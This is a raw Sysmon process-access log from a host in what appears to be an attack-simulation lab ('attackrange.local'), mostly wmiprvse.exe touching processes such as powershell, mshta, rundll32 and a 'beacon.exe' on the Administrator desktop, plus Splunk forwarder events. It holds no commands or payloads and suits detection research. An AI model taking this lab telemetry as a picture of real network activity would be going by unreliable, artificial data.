16:54:02.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240001Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240000Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239999Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239998Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239997Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239996Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239995Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239994Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239993Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239992Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239991Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239990Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239989Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239988Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240761Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:04.732{05ADC7E1-6DAC-603E-C3AA-00000000AD01}750012432C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240760Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:04.529{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6DAC-603E-C3AA-00000000AD01}7500C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240759Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:04.529{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240758Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:04.529{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240757Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:04.529{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240756Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:04.529{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240755Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:04.529{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6DAC-603E-C3AA-00000000AD01}7500C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002240754Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:04.529{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6DAC-603E-C3AA-00000000AD01}7500C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program 